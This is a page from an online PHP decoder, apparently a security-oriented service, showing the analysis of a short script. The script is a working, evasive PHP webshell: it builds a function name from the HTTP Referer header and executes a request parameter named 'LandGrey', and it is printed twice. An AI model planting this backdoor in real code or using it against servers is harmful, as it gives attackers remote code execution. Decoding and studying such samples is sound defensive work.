Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * Noticed: (PHP 5 >= 5.3.0, PHP 7) * */ $password = "LandGrey"; $wx = s..

Decoded Output download

<?php 
/** 
 * Noticed: (PHP 5 >= 5.3.0, PHP 7) 
 * 
 */ 
$password = "LandGrey"; 
$wx = substr($_SERVER["HTTP_REFERER"],-7,-4); 
forward_static_call_array($wx."ert", array($_REQUEST[$password])); 
?> 

Did this file decode correctly?

Original Code

<?php
/**
 * Noticed: (PHP 5 >= 5.3.0, PHP 7)
 *
 */
$password = "LandGrey";
$wx = substr($_SERVER["HTTP_REFERER"],-7,-4);
forward_static_call_array($wx."ert", array($_REQUEST[$password]));
?>

Function Calls

substr 1

Variables

$password LandGrey

Stats

MD5 40a94ea05ae9375d233105cfeea1b93c
Eval Count 0
Decode Time 102 ms